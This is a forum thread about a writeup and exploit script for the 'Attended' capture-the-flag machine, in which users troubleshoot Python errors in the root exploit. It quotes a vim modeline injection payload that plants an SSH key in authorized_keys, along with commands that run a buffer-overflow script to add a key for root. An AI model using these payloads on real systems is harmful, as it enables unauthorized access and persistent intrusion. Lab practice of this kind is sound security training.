FLAG Attended writeup & script
by paulwatson42016 - April 27, 2021 at 10:44 AM
#25
Did anyone get root by using the writeupScriptRoot_py script? I get errors only.
Reply
#26
There is different ways you can do

Does it work with no ssh key making and just payload in base64 ?
Maybe it not work there

If you test on binary on a virtual machine it should work and maybe ssh key making didn't work properly
Reply
#27
(May 03, 2021 at 09:38 AM)gambit1337 Wrote:
(April 30, 2021 at 12:20 PM)octami Wrote: Mate, i'm gettin the next error when executing the exploit for Root user.

File "/home/kali/exploit.py", line 111
    e = 65537L
                            ^
SyntaxError: invalid syntax

Any suggestion?
Are you using python3? That might be the reason

Yes, im using python3.

With python i m getting an error where it says
"importerror: no module named crypto.publickey.rsa"
But i have it installed...
Reply
#28
(May 03, 2021 at 11:50 AM)octami Wrote:
(May 03, 2021 at 09:38 AM)gambit1337 Wrote:
(April 30, 2021 at 12:20 PM)octami Wrote: Mate, i'm gettin the next error when executing the exploit for Root user.

File "/home/kali/exploit.py", line 111
    e = 65537L
                            ^
SyntaxError: invalid syntax

Any suggestion?
Are you using python3? That might be the reason

Yes, im using python3.

With python i m getting an error where it says
"importerror: no module named crypto.publickey.rsa"
But i have it installed...
Thats because the installed  pycrypto module is for python3 and not python2.

This might help u solve the issue if u don't mind the hassle:
https://www.kali.org/docs/general-use/us...n-versions

Or just spin up an OpenBSD VM and create the payload there
Reply
#29
(May 03, 2021 at 01:43 PM)gambit1337 Wrote:
(May 03, 2021 at 11:50 AM)octami Wrote:
(May 03, 2021 at 09:38 AM)gambit1337 Wrote:
(April 30, 2021 at 12:20 PM)octami Wrote: Mate, i'm gettin the next error when executing the exploit for Root user.

File "/home/kali/exploit.py", line 111
    e = 65537L
                            ^
SyntaxError: invalid syntax

Any suggestion?
Are you using python3? That might be the reason

Yes, im using python3.

With python i m getting an error where it says
"importerror: no module named crypto.publickey.rsa"
But i have it installed...
Thats because the installed  pycrypto module is for python3 and not python2.

This might help u solve the issue if u don't mind the hassle:
https://www.kali.org/docs/general-use/us...n-versions

Or just spin up an OpenBSD VM and create the payload there


Thank you mate, i' try it
Reply
#30
Still can't ssh to Attended using the method you have provided.

I am trying the following attachment, to get the User flag, but it does not seems to be working. What could be wrong?


Spoiler
:!echo -en 'Host *\n  User freshness\n  ControlMaster auto\n  ControlPath /tmp/%[email protected]%h:%p\n  ControlPersist 4h\n  TCPKeepAlive yes\n  ServerAliveInterval 60\n  ProxyCommand echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBFoHahcwzluQ/MsFDBAPrLIBJj3uc7g8dpjf+/r52Y5 >> /home/freshness/.ssh/authorized_keys\n' > /home/shared/config ||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="



When I try to ssh using my PrivKey, it keeps asking for the "freshness" user password. This machine is driving me nuts.
Reply
#31
I don't have any credits, can anyone help me with the writeup?
Thanks!
Reply
#32
Hey got below error for the root part, could you help please?
┌──(root💀kali)-[~/htb/boxes/attdended]
└─# python writeupScriptRoot.py "echo $(cat freshness.pub) >> /root/.ssh/authorized_keys"
Traceback (most recent call last):
  File "writeupScriptRoot.py", line 1, in <module>
    from Crypto.PublicKey.RSA import construct
ImportError: No module named Crypto.PublicKey.RSA
┌──(root💀kali)-[~/htb/boxes/attdended]
└─# python3 writeupScriptRoot.py "echo $(cat freshness.pub) >> /root/.ssh/authorized_keys"
Traceback (most recent call last):
  File "/root/htb/boxes/attdended/writeupScriptRoot.py", line 70, in <module>
    payload += args + cmd + 'A' * (754 - (len(argv) + 1) * 0x8 - len(args) - len(cmd) - 16) # after adjustment offset is 754
TypeError: can't concat str to bytes
Reply
#33
(May 08, 2021 at 12:18 PM)robott Wrote: Hey got below error for the root part, could you help please?
┌──(root💀kali)-[~/htb/boxes/attdended]
└─# python writeupScriptRoot.py "echo $(cat freshness.pub) >> /root/.ssh/authorized_keys"
Traceback (most recent call last):
  File "writeupScriptRoot.py", line 1, in <module>
    from Crypto.PublicKey.RSA import construct
ImportError: No module named Crypto.PublicKey.RSA
┌──(root💀kali)-[~/htb/boxes/attdended]
└─# python3 writeupScriptRoot.py "echo $(cat freshness.pub) >> /root/.ssh/authorized_keys"
Traceback (most recent call last):
  File "/root/htb/boxes/attdended/writeupScriptRoot.py", line 70, in <module>
    payload += args + cmd + 'A' * (754 - (len(argv) + 1) * 0x8 - len(args) - len(cmd) - 16) # after adjustment offset is 754
TypeError: can't concat str to bytes
Either install the module to use python version 2
Or put .encode() after strings to make python3 work
Reply
#34
(May 08, 2021 at 01:13 PM)paulwatson42016 Wrote:
(May 08, 2021 at 12:18 PM)robott Wrote: Hey got below error for the root part, could you help please?
┌──(root💀kali)-[~/htb/boxes/attdended]
└─# python writeupScriptRoot.py "echo $(cat freshness.pub) >> /root/.ssh/authorized_keys"
Traceback (most recent call last):
  File "writeupScriptRoot.py", line 1, in <module>
    from Crypto.PublicKey.RSA import construct
ImportError: No module named Crypto.PublicKey.RSA
┌──(root💀kali)-[~/htb/boxes/attdended]
└─# python3 writeupScriptRoot.py "echo $(cat freshness.pub) >> /root/.ssh/authorized_keys"
Traceback (most recent call last):
  File "/root/htb/boxes/attdended/writeupScriptRoot.py", line 70, in <module>
    payload += args + cmd + 'A' * (754 - (len(argv) + 1) * 0x8 - len(args) - len(cmd) - 16) # after adjustment offset is 754
TypeError: can't concat str to bytes
Either install the module to use python version 2
Or put .encode() after strings to make python3 work

l installed python2 but still not working, and ldk where to add the put.encode() on the script after string as you said, what string?  l did something like below
payload += args + cmd + 'A' * (754 - (len(argv) + 1) * 0x8 - len(args) - len(cmd) - 16)
put.encode()

┌──(root💀kali)-[~/htb/boxes/attdended]
└─# pyenv install 2.7.18
Downloading Python-2.7.18.tar.xz...
-> https://www.python.org/ftp/python/2.7.18....18.tar.xz
Installing Python-2.7.18...
Installed Python-2.7.18 to /root/.pyenv/versions/2.7.18

┌──(root💀kali)-[~/htb/boxes/attdended]
└─# python2 writeupScriptRoot.py "echo $(cat freshness.pub) >> /root/.ssh/authorized_keys"
Traceback (most recent call last):
  File "writeupScriptRoot.py", line 1, in <module>
    from Crypto.PublicKey.RSA import construct
ImportError: No module named Crypto.PublicKey.RSA
Reply
#35
Thank you very much. Your post was very helpful to me
Reply
#36
Hey there,

I wrote the python script output to /root/.ssh/authorized_keys, but l just can't login, do you know whats wrong? Thanks 

[email protected]:~/htb/boxes/attendend# python writeupScriptRoot.py "echo $(cat freshness.pub)" > /root/.ssh/authorized_keys
[email protected]:~/htb/boxes/attendend# ssh -i freshness [email protected] -p 2222
[email protected]'s password:
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL ATTENDED [DISCUSSION] 0xvijay 91 27,005 May 08, 2021 at 07:26 AM
Last Post: Destroy3r3
TUTORIAL HTB: "Toxic" - Flag & Detailed Writeup Including an Auto Exploit Script quas4r 0 868 May 02, 2021 at 11:16 AM
Last Post: quas4r
FLAG Attended writeup xicla 7 1,653 May 01, 2021 at 05:34 PM
Last Post: im_RobOT

 Users browsing this thread: 2 Guest(s)